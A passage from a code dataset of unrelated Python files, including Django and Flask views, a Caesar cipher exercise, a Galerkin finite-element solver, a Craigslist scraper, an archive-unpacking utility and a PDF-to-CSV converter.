port=None,\n        port_specified=False,\n        domain=\".nhl.com\",\n        domain_specified=False,\n        domain_initial_dot=False,\n        path=\"/\",\n        path_specified=True,\n        secure=False,\n        discard=False,\n        comment=\"TestCookie\",\n        comment_url=None,\n        expires=(int(time()) + 7500),\n        rest={},\n    )\n","sub_path":"nhltv_lib/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"369497345","text":"from django.shortcuts import render,redirect\nfrom user.models import common_member, common_member_action_log, follower_pair, common_member_star\nfrom article.models import forum_post\nfrom django.urls import reverse\nfrom homepage.form import UserInfoChangeForm\nfrom gongchengmiao_BBS import settings\nfrom django.http import HttpResponseRedirect\n# Create your views here.\n\n\ndef show_info(request, username):\n    user = common_member.objects.filter(username=username)  # the user whose page is being viewed\n    if len(user) == 0:\n        return redirect(reverse('index'))\n    user = user[0]\n    actions = common_member_action_log.objects.filter(uid=user).order_by('-dateline')[0:5]\n\n    if request.method == 'GET' and len(request.GET):\n        if 'btn' in list(request.GET) and request.GET['btn'] == 'show_more':\n            actions = common_member_action_log.objects.filter(uid=user).order_by('-dateline')[0:10]\n        elif 'btn' in list(request.GET) and request.GET['btn'] == 'follow_him' and username != request.user.username:\n            common_member.objects.filter(username=username).update(followed=user.followed+1)\n            common_member.objects.filter(username=request.user.username).update(following=request.user.following+1)\n            follower_pair.objects.create(followed=user, by=request.user)\n            user = common_member.objects.filter(username=username)  # re-fetch the viewed user after the update\n            user = user[0]\n        elif 'btn' in list(request.GET) and request.GET['btn'] == 'send_msg':\n            pass\n        elif 'star_btn' in list(request.GET):\n            the_post = forum_post.objects.filter(pid=int(request.GET['star_btn']))[0]\n            common_member_action_log.objects.create(uid=request.user, pid=the_post, action='star')\n            # only create a star if this user has not starred the post yet\n            if len(common_member_star.objects.filter(uid=request.user, pid=the_post)) == 0:\n                common_member_star.objects.create(uid=request.user, pid=the_post)\n\n    context = {\n        'username': user.username,\n        'gender': user.gender,\n        'profile': user.profile,\n        'posts': user.posts,\n        'following': user.following,\n        'followed': user.followed,\n        'portrait': user.portrait,\n        'actions': enumerate(actions)\n    }\n\n    return render(request, 'personal_page_show_demo.html', context)\n\n\n\ndef view_self_info(request):\n    # print('view_self')\n    if not request.user.is_authenticated:\n        return redirect(reverse('login'))\n    my_actions = common_member_action_log.objects.filter(uid=request.user).order_by('-dateline')[0:10]\n\n    my_followings = follower_pair.objects.filter(by=request.user).order_by('-follow_time').all()\n    following_id = []\n    for following in my_followings:\n        following_id.append(following.followed)\n    following_actions = common_member_action_log.objects.filter(uid__in=following_id).order_by('-dateline')[0:10]\n    following_id = following_id[0:5]\n    my_star_posts = common_member_star.objects.filter(uid=request.user).order_by('-star_time')[0:10]\n    portrait = str(request.user.portrait)\n    context = {\n        'username': request.user.username,\n        'portrait': portrait,\n        'gender': request.user.gender,\n        'profile': request.user.profile,\n        'posts': request.user.posts,\n        'my_actions': enumerate(my_actions),\n        'followings': enumerate(following_id),\n        'following_actions': 
enumerate(following_actions),\n 'my_star_posts': enumerate(my_star_posts)\n }\n\n return render(request, 'personal_page_demo.html', context)\n\n\ndef edit_info(request):\n if request.user.is_authenticated == False:\n return redirect(reverse('login'))\n\n instance_user = common_member.objects.filter(username=request.user.username).all()[0]\n if request.method == 'GET':\n myform = UserInfoChangeForm(instance=instance_user)\n return render(request, \"edit_person_demo.html\", {\"form\": myform, \"portrait\": request.user.portrait})\n else:\n myform = UserInfoChangeForm(request.POST, request.FILES, instance=instance_user)\n if myform.is_valid():\n # print('valid')\n myform.save()\n # print(myform.errors)\n else:\n # print(myform.errors)\n pass\n return render(request, 'edit_person_demo.html', {\"form\": myform, \"portrait\": request.user.portrait})\n","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280011833","text":"import random\ndef encrypt(text,key):\n res=\"\"\n for i in range(len(text)):\n ch=text[i]\n if(ch.isupper()):\n res+=chr((ord(ch)+key-65)%26+65)\n else:\n res+=chr((ord(ch)+key-97)%26+97)\n return(res)\ndef decrypt(text,key):\n res=\"\"\n for i in range(len(text)):\n ch=text[i]\n if(ch.isupper()):\n res+=chr((ord(ch)-key-65)%26+65)\n else:\n res+=chr((ord(ch)-key-97)%26+97)\n return res \ntext=input()\nkey=input()\nprint(text)\nprint(key)\nprint(encrypt(text,int(key)))\nk=input()\nlist=[i for i in range(11)]\nfor i in range(5):\n s=random.choice(list)\n print(s)\n s1=encrypt(k,s)\n print(s1)\n print(decrypt(s1,s))","sub_path":"ins lab python programs/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"332614754","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.linalg import solve_banded\nimport math\nimport seaborn as sns\nsns.set_style(\"whitegrid\")\n\n\ndef tridiagsolver(K,F):\n ud = np.insert(np.diag(K,1), 0, 0) # upper diagonal\n d = np.diag(K) # main diagonal\n ld = np.insert(np.diag(K,-1), len(F)-1, 0) # lower diagonal\n ab = np.matrix([ud, d, ld]) # simplified matrix\n a = solve_banded((1, 1), ab, F)\n return a\n\ndef psi(j,x, dx):\n if x > (j+1)*dx or x < (j-1)*dx:\n return 0\n elif x < j*dx:\n return (x - (j-1)*dx)/dx\n else:\n return ((j+1)*dx - x)/dx\n\ndef galerkin1d(nx):\n x = np.linspace(0,1,nx)\n dx = 1.0/(nx-1)\n K = np.zeros((nx,nx)) # Stiffness matrix\n for i in range(nx):\n if i == 0:\n K[i,i] = 1\n K[i,i+1] = 0\n elif i == len(K)-1:\n K[i,i] = 1\n K[i,i-1] = 0\n else:\n K[i,i] = 2/dx\n K[i,i-1] = -1/dx\n K[i,i+1] = -1/dx\n \n F = np.zeros(nx) # Load vector\n F [0] = 0\n F[1:-1] = (-1.0/dx)*(2*np.cos(x[1:-1]) - np.cos(x[0:-2]) - np.cos(x[2:]))\n F[-1] = 1\n \n a = tridiagsolver(K,F) # Solve system\n \n nxplot = 200 # Recombine phi from basis functions\n plot_x = np.linspace(0,1,nxplot)\n phi_galerkin = np.zeros(nxplot)\n for i in range(len(plot_x)): \n for j in range(len(a)):\n phi_galerkin[i] += a[j]*psi(j, plot_x[i], dx)\n return phi_galerkin\n\nif __name__ == \"__main__\":\n plot_x = np.linspace(0,1,200) # points for plotting\n phi_galerkin5 = galerkin1d(nx=5)\n phi_galerkin9 = galerkin1d(nx=9)\n phi_analy = -np.cos(plot_x) + np.cos(1)*plot_x + 1\n\n plt.figure(1)\n plt.plot(plot_x, phi_analy, label= \"Analytical\")\n plt.plot(plot_x, phi_galerkin5, 
label=\"Galerkin FE\")\n plt.title(\"Galerkin FE 5 Nodes\")\n plt.ylabel(\"$\\phi$\")\n plt.xlabel(\"x\")\n plt.legend()\n\n plt.figure(2)\n plt.plot(plot_x, phi_analy, label= \"Analytical\")\n plt.plot(plot_x, phi_galerkin9, label=\"Galerkin FE\")\n plt.title(\"Galerkin FE 9 Nodes\")\n plt.ylabel(\"$\\phi$\")\n plt.xlabel(\"x\")\n plt.legend()\n\n plt.figure(3)\n plt.plot(plot_x, np.abs(phi_analy-phi_galerkin5), label= \"5 Node num-analytical error\")\n plt.plot(plot_x, np.abs(phi_analy-phi_galerkin9), label= \"9 Node num-analytical error\")\n plt.title(\"Galerkin FE Error Compared to Analytic Solution\")\n plt.ylabel(\"Error\")\n plt.xlabel(\"x\")\n plt.legend()\n plt.show()\n","sub_path":"hw1/galerkin.py","file_name":"galerkin.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288120031","text":"import numpy as np\n\na = np.arange(15)\n\n# method 1\nindex = np.where((a >= 5) & (a <= 10))\n# print(index)\nb = a[index]\nprint(a)\nprint(b)\n\n# method 2\nindex = np.where(np.logical_and(a>=5, a<=10))\nc = a[index]\nprint(c)\n\n# method 3\nd = a[(a >= 5) & (a <= 10)]\nprint(d)","sub_path":"从numpy数组中提取给定范围内的所有数字.py","file_name":"从numpy数组中提取给定范围内的所有数字.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55123666","text":"import logging\nimport sys\n\nargvs = sys.argv\nksname = argvs[1]\n\nlog = logging.getLogger()\nlog.setLevel('DEBUG')\nhandler = logging.StreamHandler()\nhandler.setFormatter(logging.Formatter(\"%(asctime)s [%(levelname)s] %(name)s: %(message)s\"))\nlog.addHandler(handler)\n\nfrom cassandra import ConsistencyLevel\nfrom cassandra.cluster import Cluster\nfrom cassandra.query import SimpleStatement\n\nKEYSPACE = ksname\n\n\ndef main():\n cluster = Cluster(['127.0.0.1'])\n session = cluster.connect()\n\n log.info(\"creating keyspace...\")\n session.execute(\"\"\"\n CREATE KEYSPACE IF NOT EXISTS %s\n WITH replication = { 'class': 'SimpleStrategy', 'replication_factor': '2' }\n \"\"\" % KEYSPACE)\n\n log.info(\"setting keyspace...\")\n session.set_keyspace(KEYSPACE)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cassandra/create_keyspace_2.py","file_name":"create_keyspace_2.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"147430610","text":"\"\"\"\nWrite a Python program to find the minimum window in a given string which will contain all the characters of another given string.\nExample 1\nInput : str1 = \" PRWSOERIUSFK \"\nstr2 = \" OSU \"\nOutput: Minimum window is \"OERIUS\"\n\"\"\"\nimport collections\ndef min_window(str1, str2):\n result_char, missing_char = collections.Counter(str2), len(str2)\n i = p = q = 0\n for j, c in enumerate(str1, 1):\n missing_char -= result_char[c] > 0\n result_char[c] -= 1\n if not missing_char:\n while i < q and result_char[str1[i]] < 0:\n result_char[str1[i]] += 1\n i += 1\n if not q or j - i <= q - p:\n p, q = i, j\n return str1[p:q]\n \nstr1 = \"PRWSOERIUSFK\"\nstr2 = \"OSU\"\nprint(\"Original Strings:\\n\",str1,\"\\n\",str2)\nprint(\"Minimum window:\")\nprint(min_window(str1,str2))","sub_path":"Aniyom Ebenezer/Phase 2/STRINGS/Day_36_Challenge_Solution/Question 4 Solution.py","file_name":"Question 4 Solution.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
+{"seq_id":"189361544","text":"from utils import read_aloud\nfrom twython import TwythonStreamer\nimport twitter\n\nif __name__ == \"__main__\":\n with open('apikey', 'r') as f:\n app_key, app_secret, oauth_token, oauth_token_secret = [s.strip() for s in f.readlines()]\n\n auth = twitter.OAuth(oauth_token, oauth_token_secret, app_key, app_secret)\n\n stream = twitter.stream.TwitterStream(auth=auth, domain='userstream.twitter.com')\n\n for msg in stream.user():\n if 'direct_message' in msg:\n read_aloud('{0}'.format(msg['direct_message']['text']))\n\n read_aloud(\"Uh-oh, the direct message stream stopped!\")\n","sub_path":"read_dms.py","file_name":"read_dms.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"598626319","text":"\nimport sys\nimport hashlib\nimport re\nimport os\nfrom multiprocessing import Process, current_process ,Queue, Pool\nimport threading\nimport socket\nimport datetime\nimport time\nimport urllib\nimport urllib.request\nimport zipfile\nimport json\nimport hashlib\nimport shutil\nfrom urllib.request import Request, urlopen\nimport signal\nimport patoolib\n#from unrar import rarfile\n\nimport unrar\nimport rarfile\n\nfrom requests import get\nfrom pyunpack import Archive\nimport filetype\nfrom bs4 import BeautifulSoup\nimport requests\n\nimport craw_comm as c_c\n\n\ndef handler(signum,frame):\n raise Exception(\"timeout\")\n\n\n\ndef unzip_process():\n temp_sample_list=[os.path.join(c_c.PATH_TEMP,fname) for fname in [fname for fname in os.listdir(c_c.PATH_TEMP)]]\n #TEMP 경로에 있는 파일 Unzip 수행\n #Unzip의 경우 zip 내 또 있을 수 있음.\n temp_sample_list=unzip_manager(temp_sample_list)\n \n for temp_sample in temp_sample_list:\n if temp_sample==c_c.PATH_TEMP:continue\n\n #Unzip 후 하위 디렉토리에 있는 것들 상위로 긁어옴\n dir_move_sample(temp_sample)\n #확장자 별로 파일 이동\n #OTHERS : 알 수 없음\n #ext : 확장자 별 이동\n sample_move_extenstion(temp_sample)\n \n #TEMP 폴더 내 빈 dir 파일이 있는 경우 하위 디렉토리까지 삭제\n dir_remove(temp_sample_list)\n\n\nunzip_list=['7z','bz2','xz','tar','rar','Z','lz','sqlite','swf','gz','zip','ar','arj','xz']\ndef unzip_manager(temp_sample_list):\n #반복문을 통한 flag 설정\n \n while True:\n for temp_sample in temp_sample_list:\n unzip_sample(temp_sample)\n temp_sample_list=[os.path.join(c_c.PATH_TEMP,fname) for fname in [fname for fname in os.listdir(c_c.PATH_TEMP)]]\n #만약, 압축 해제 했는데 zip이 있다면 리스트가 있을 것이고, 없으면 빈리스트\n temp_sample_list=[temp_sample for temp_sample in temp_sample_list if not os.path.isdir(temp_sample)]\n zip_list=[0 for temp_sample in temp_sample_list if filetype.guess(temp_sample) in unzip_list]\n if zip_list==[]:return temp_sample_list \n\n\ndef unzip_sample(temp_sample_path,_password=None):\n dir_path=os.path.dirname(temp_sample_path)\n if os.path.isdir(temp_sample_path):return\n if os.path.exists(temp_sample_path)!=True:return\n try:\n kind=filetype.guess(temp_sample_path)\n except Exception:\n return\n def _zip():\n try:\n zFile=zipfile.ZipFile(temp_sample_path)\n except zipfile.BadZipFile:\n etc_unpack()\n return\n\n if _password:\n try:\n zFile.setpassword(_password)\n except:\n pass\n for zfile_name in zFile.namelist():\n #Temp 경로에 압축해제 압축해재시 압축파일 내부에 있는 이름으로 진행\n try:\n zFile.extract(zfile_name,dir_path)\n except:\n continue\n #Temp에 압축해제된 파일 풀 경로 설정\n #unpack_file_path=os.path.join(dir_path,zfile_name)\n #unpack_file_path_list.append(unpack_file_path)\n zFile.close()\n\n def etc_unpack():\n #temp_sample_dir_path=temp_sample_path.split('.')[0]\n signal.signal(signal.SIGALRM, handler)\n 
signal.alarm(4)\n try:\n Archive(temp_sample_path).extractall(c_c.PATH_TEMP)\n except:\n return\n\n def _unrar():\n rf = rarfile.RarFile(temp_sample_path)\n try:\n rf.extractall(path=c_c.PATH_TEMP,pwd=_password) \n except:\n try:\n rf.extractall(path=c_c.PATH_TEMP)\n except:\n return\n\n if kind!=None:\n try:\n if kind.extension=='zip':\n _zip()\n elif kind.extension=='rar':\n _unrar()\n elif kind.extension in unzip_list:\n etc_unpack()\n except Exception:\n pass\n if kind.extension in unzip_list:\n try:\n os.remove(temp_sample_path)\n except:\n return \n\ndef dir_remove(temp_sample_list):\n \n dir_list=list()\n for temp_sample in temp_sample_list:\n if temp_sample==c_c.PATH_TEMP:continue\n\n if os.path.isdir(temp_sample):\n dir_list.append(temp_sample)\n\n for dir_ in list(set(dir_list)):\n shutil.rmtree(dir_,ignore_errors=True)\n\ndef sample_move_extenstion(temp_sample):\n if os.path.isdir(temp_sample):return\n if os.path.exists(temp_sample)!=True:return\n\n kind = filetype.guess(temp_sample)\n if kind!=None:\n if kind in unzip_list:\n return\n\n ext_fname_path,ext_path=get_type(temp_sample)\n if ext_fname_path==None:\n shutil.move(temp_sample,os.path.join(c_c.PATH_OTHERS,os.path.basename(temp_sample)))\n else:\n if not os.path.exists(ext_path): \n os.makedirs(ext_path)\n shutil.move(temp_sample,ext_fname_path) \n\n\n\n\n\n\n\ndef dir_move_sample(temp_sample):\n if os.path.isdir(temp_sample):\n for root, dirs, files in os.walk(temp_sample):\n for file_ in files:\n shutil.move(os.path.join(root,file_),os.path.join(c_c.PATH_TEMP,file_))\n\ndef get_type(temp_sample_path):\n try:\n kind = filetype.guess(temp_sample_path)\n except OSError:\n return None, ''\n\n file_name=os.path.basename(temp_sample_path).split('.')[0]\n\n if kind==None:\n \n if len(os.path.basename(file_name).split('.'))>=2:\n ext=os.path.basename(file_name).split('.')[1].replace('.','')\n ext_path=os.path.join(c_c.PATH,ext)\n ext_fname_path=os.path.join(ext_path,file_name)\n return ext_fname_path,ext_path\n else:\n\n return None,''\n\n else:\n ext_path=os.path.join(c_c.PATH,kind.extension)\n ext_fname_path=os.path.join(ext_path,file_name)\n return ext_fname_path,ext_path","sub_path":"unzip_manager.py","file_name":"unzip_manager.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239789115","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\n# init 12345\n# oldhead oldtail\n# 1---->2---->3---->4----->5\n# prev trav beyound\n\n\n# final 14325\n# newtail newhead\n# 1 2<----3<----4 5\n# prev trav beyound\n\n# reverse_k(trav, k) -> beyound, newhead, newtail \n\n# rewire\n# prev->newhead\n# newtail->beyound\n\n# advance\n# prev = trav\n# trav = beyound\n\n# k==3\n# nptr<-1<-2<-3 4\n# p t n\n\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n if not head: return head\n \n def has_k_nodes(trav, k):\n while trav and k:\n trav = trav.next\n k -= 1\n return k == 0\n \n def reverse_k_nodes(trav, k):\n newtail = trav\n prev = None\n for i in range(k):\n next_ = trav.next\n trav.next = prev\n prev = trav\n trav = next_\n return trav, prev, newtail\n \n dummy = prev = ListNode(None)\n trav = dummy.next = head\n while has_k_nodes(trav, k):\n beyound, newhead, newtail = reverse_k_nodes(trav, k)\n \n prev.next = newhead\n newtail.next = beyound\n \n prev = trav\n trav = beyound\n \n prev.next = trav\n return 
dummy.next\n","sub_path":"code/25_solution.py","file_name":"25_solution.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"325402784","text":"\"\"\"\n===================\nSyncing two folders\n===================\n\nThis example is about syncing two folders\nor creating a backup.\n\n\"\"\"\n\n###############################\nfrom pyquickhelper.filehelper import synchronize_folder\n\n###############################\ndest = \"temp_sync\"\nimport os\nif not os.path.exists(dest):\n print(\"creating\", dest)\n os.makedirs(dest)\nelse:\n print(\"folder already created\", dest)\n\n###############################\nsynchronize_folder(os.path.abspath(\".\"),\n dest, fLOG=print)\n","sub_path":"_doc/examples/plot_sync.py","file_name":"plot_sync.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"345705862","text":"from scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\nfrom scrapy.selector import Selector\nfrom scrapy.http.request import Request\nfrom raleigh.items import RaleighItem\nimport datetime\nfrom dateutil import parser\n\nclass RaleighSpider(CrawlSpider):\n name = 'raleigh'\n allowed_domains = [\"raleigh.craigslist.org\"]\n base_url = \"http://raleigh.craigslist.org\"\n start_urls = [\"http://raleigh.craigslist.org/search/apa?srchType=T&bedrooms=1&bathrooms=1\"]\n rules = [\n Rule(LinkExtractor(allow=(), restrict_xpaths=('//div[@class=\"content\"]//a[@class=\"button next\"]')), callback='parse_listings', follow=True)\n ]\n\n def parse_listings(self, response):\n today = datetime.datetime.now()\n since = today - datetime.timedelta(days=1)\n rows = Selector(response).xpath('//p[@class=\"row\"]')\n items = []\n for row in rows:\n datestr = self.getString(row.xpath('.//span[@class=\"pl\"]/time/@datetime').extract())\n date = parser.parse(datestr)\n if (date > since):\n item = RaleighItem()\n item['location'] = self.getString(row.xpath('.//span[@class=\"l2\"]/span[@class=\"pnr\"]/small/text()').extract())\n item['housing'] = self.getString(row.xpath('.//span[@class=\"l2\"]/span[@class=\"housing\"]/text()').extract())\n item['title'] = self.getString(row.xpath('.//span[@class=\"pl\"]/a[@class=\"hdrlnk\"]/text()').extract())\n item['url'] = self.base_url + self.getString(row.xpath('.//a/@href').extract())\n item['price'] = self.getString(row.xpath('.//span[@class=\"l2\"]/span[@class=\"price\"]/text()').extract())\n item['date'] = self.getString(row.xpath('.//span[@class=\"pl\"]/time/@datetime').extract())\n item['posting_id'] = self.getString(row.xpath('.//@data-pid').extract())\n request = Request(item['url'], callback=self.parse_individual)\n request.meta['item'] = item\n yield request\n\n def parse_individual(self, response):\n item = response.meta['item']\n reply_url = self.base_url + self.getString(response.xpath('.//span[@class=\"replylink\"]/a/@href').extract())\n request = Request(reply_url, callback=self.parse_reply)\n request.meta['item'] = item\n yield request\n\n def parse_reply(self, response):\n item = response.meta['item']\n item['email'] = self.getString(response.xpath('.//li/a[@class=\"mailapp\"]/text()').extract())\n return item\n\n def getString(self, field):\n if (type(field) == list and len(field)!= 0):\n return field[0].encode('utf-8')\n return 
\"\"\n","sub_path":"scrapy/raleigh/raleigh/spiders/raleigh_spider.py","file_name":"raleigh_spider.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"67369803","text":"@ask.intent('AlarmBuddy_SendSound', mapping={'friend_uname' : 'friend_uname', 'sound_id' : 'sound_id'})\r\ndef SendSoundIntent(friend_uname, sound_id):\r\n if(friend_uname is None):\r\n speak_output = \"Sorry, you must specify a username to send a sound to.\"\r\n return question(speak_output).reprompt(speak_output).simple_card('AddFriend_UnameError', speak_output)\r\n if(sound_id is None):\r\n speak_output = \"Sorry, you must specify a recorded alarm to send.\"\r\n return question(speak_output).reprompt(speak_output).simple_card('SendSound_SoundIdError', speak_output)\r\n\r\n #get list of friends\r\n friends_list_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']\r\n friends_list = requests.get(friends_list_url, headers=header).json()\r\n\r\n #check that recipient is a friend\r\n friend_found = False\r\n for friend in friends_list:\r\n if friend['username2'] == friend_uname:\r\n friend_found = True\r\n if(not friend_found):\r\n speak_output = \"Sorry, you must be friends with someone to send them an alarm.\"\r\n return question(speak_output).reprompt(speak_output).simple_card('SendSound_NotFriendError', speak_output)\r\n \r\n #get list of sounds\r\n sound_list_url = config['base_url'] + '/sounds/' + config['alarmbuddy_account']['username']\r\n sound_list = requests.get(sound_list_url, headers=header).json()\r\n\r\n #find requested sound\r\n sound_to_send = None\r\n for sound in sound_list:\r\n if sound['soundID'] == sound_id:\r\n sound_to_send = sound\r\n\r\n if sound_to_send is None:\r\n speak_output = \"Sorry, an alarm sound with that name cannot be found. Have you recorded it?\"\r\n return question(speak_output).reprompt(speak_output).simple_card('SendSound_SoundNotFoundError', speak_output)\r\n\r\n #Send the sound.\r\n send_sound_url = config['base_url'] + '/shareSound/' + config['alarmbuddy_account']['username'] + '/' + friend_uname + '/' + str(sound_to_send['soundID'])\r\n u = requests.post(send_sound_url, headers=header)\r\n if(u.status_code != 201):\r\n speak_output = \"Something went wrong. We couldn't send the sound to your friend.\"\r\n return question(speak_output).reprompt(speak_output).simple_card('SendSound_Error', speak_output)\r\n\r\n return statement('Okay. 
' + sound_to_send['soundName'] + ' has been sent to ' + friend_uname)\r\n","sub_path":"Amazon Skills Development/send_sound.py","file_name":"send_sound.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"36402304","text":"# -*- coding: utf-8 -*-\n\nimport web\nimport json\nimport logging\nimport protocol\nfrom config import *\nfrom utils import *\nfrom session_manager import SessionManager\n\nlogger = logging.getLogger()\n\nclass Handler:\n    def POST(self):\n        req = protocol.ReportCommentReq(web.input(), web.cookies())\n        resp = protocol.ReportCommentResp()\n\n        if not SessionManager.instance().check_session(req.session_id, req.device_id, req.userid):\n            resp.res = 401\n            resp.msg = 'invalid login state'\n            return resp.dump_json()\n        \n        url = 'http://' + TASK_BACKEND + '/report_comment'\n        data = {\n            'userid': req.userid,\n            'device_id': req.device_id\n        }\n\n        r = http_request(url, data)\n        if r['rtn'] == 0:\n            resp.income = r.get('income', 0)\n        else:\n            resp.res = 1\n            resp.msg = 'error'\n\n        return resp.dump_json()\n\n","sub_path":"wangcai_svr/interface/src/req_task_comment.py","file_name":"req_task_comment.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"103743915","text":"import re\nimport json\nimport csv\nimport os\n\ndef save(filepath,data):\n    if os.path.exists(filepath):\n        with open(filepath,'a',encoding='utf-8-sig' ,newline='' ) as f:\n            csv_f=csv.writer(f)\n            csv_f.writerow(list(data.values()))\n    else:\n        with open(filepath,'a',encoding='utf-8-sig' ,newline='' ) as f:\n            csv_f=csv.writer(f)\n            csv_f.writerow(list(data.keys()))\n            csv_f.writerow(list(data.values()))\n\nf=open('s.json','r',encoding='utf-8')\nleft_str=''\ncount=0\nchunksize=100000000\nwhile True:\n    chunk=f.read(chunksize)\n    if not chunk:\n        break\n    chunk=left_str+chunk\n\n    last_end=0\n    for match in re.finditer(r'(\\{.*?date.*?\\})',chunk,re.S):\n        last_end=match.end()\n        try:\n            json_item=json.loads(match.group(1))\n            date=json_item['date'][:4]\n            save(filepath=date+'.csv',data=json_item)\n        except Exception as e:\n            print(e)\n\n    # keep any incomplete trailing record and prepend it to the next chunk\n    left_str=chunk[last_end:]\n\n    count+=chunksize\n    print(count,len(left_str))\n    print(f'Processed {count/1024/1024}Mb')\n\nf.close()","sub_path":"job-json,xml,csv/Re-拆分过滤json/拆分json.py","file_name":"拆分json.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"386179113","text":"# 2520 is the smallest number that can be divided\n# by each of the numbers from 1 to 10 without any remainder.\n#\n# What is the smallest positive number that is evenly\n# divisible by all of the numbers from 1 to 20?\n\n\ndef isDivisiable(div, max_range):\n    for i in range(1, max_range + 1):\n        if div % i != 0:\n            return False\n    return True\n\ndef main():\n    i = 1\n\n    while True:\n        if isDivisiable(i, 20):\n            break\n        i += 1\n\n    print(i)\n\n\nif __name__ == \"__main__\":\n    print(2* 3 * 2* 5* 7* 2* 3 * 11 * 13 * 2 * 17 * 19)  # hand-computed answer: 232792560\n","sub_path":"1-10/SmallestMultiple.py","file_name":"SmallestMultiple.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"17685717","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nimport os\n\ndef SeparaCampos(s):\n    # The fields are separated by long runs of spaces. We need to replace these\n    # runs of spaces with a comma. The lines already end with \\n\n\n    resposta = ''\n    estado = 0\n    for letra in s:\n        if estado == 0:\n            if letra != ' ': # in the middle of a word\n                resposta += letra\n            elif letra == ' ': # not yet clear whether this is a word separator or not\n                estado = 1\n        elif estado == 1:\n            if letra != ' ': # it was a single word-separating space\n                resposta += ' ' + letra\n                estado = 0\n            elif letra == ' ': # a run of spaces\n                resposta += ','\n                estado = 2\n        elif estado == 2:\n            if letra != ' ': # the run of spaces has ended\n                resposta += letra\n                estado = 0\n    return resposta\n\n\ndef ConvertePDF2CSV(pdf):\n    # We only need to process the lines that start with exactly 1 space\n\n    txt = pdf.replace('.pdf', '.txt')\n    csv = pdf.replace('.pdf', '.csv')\n    os.system('pdftotext -layout ' + pdf)\n    entrada = open(txt).readlines()\n    saida = open(csv, 'wt')\n\n    dados = filter(lambda x: (x[0] == ' ') and (x[1] != ' '), entrada)\n    resultado = []\n    for linha in dados:\n        resultado.append(SeparaCampos(linha[1:].replace(',', '.')))\n\n    saida.writelines(resultado)\n    return\n\nif len(sys.argv) == 2:\n    ConvertePDF2CSV(sys.argv[1])\n","sub_path":"FolhaPagamento/converteCSV.py","file_name":"converteCSV.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"583693053","text":"import flask\r\nimport json\r\nimport os\r\nimport fnmatch\r\nimport time\r\nfrom flask import request\r\nfrom flask import Blueprint\r\nfrom utils.db_connection import mysql\r\n\r\n\r\n\r\nkorpa_service = Blueprint(\"korpa\", __name__)\r\n\r\n@korpa_service.route(\"/dodajUkorpu/<id_proizvoda>\", methods=[\"POST\"])\r\ndef dodajUKorpu(id_proizvoda):\r\n    data = request.json\r\n    db = mysql.get_db()\r\n    cursor = db.cursor()\r\n\r\n    q = '''INSERT INTO korpa_proizvod(korpa_id, kolicina, proizvod_id)\r\n            VALUES(%s, %s, %s)'''\r\n    cursor.execute(q, (data[\"korpa_id\"], data[\"kolicina\"], id_proizvoda))\r\n    db.commit()\r\n    \r\n    return flask.jsonify({\"status\": \"done\"}), 201\r\n\r\n@korpa_service.route(\"/dobaviIzKorpe/<id_korpe>\", methods=[\"GET\"])\r\ndef dobaviIzKorpe(id_korpe):\r\n    cursor = mysql.get_db().cursor()\r\n    cursor.execute(\"SELECT * FROM korpa_proizvod LEFT JOIN proizvod ON proizvod_id = proizvod.id WHERE korpa_id = %s AND proizvod.postoji = 1\", id_korpe)\r\n    rows = cursor.fetchall()\r\n\r\n    for x in range(0, len(rows)):\r\n        files = os.listdir(\"static/proizvodi\")\r\n        slika = fnmatch.filter(files, \"proizvod_{0}.*\".format(rows[x][\"id\"]))\r\n        if slika != []:\r\n            rows[x][\"slika\"] = slika[0]\r\n\r\n    return flask.jsonify(rows)\r\n\r\n@korpa_service.route(\"/dobaviSaRacuna/<id_korisnika>\", 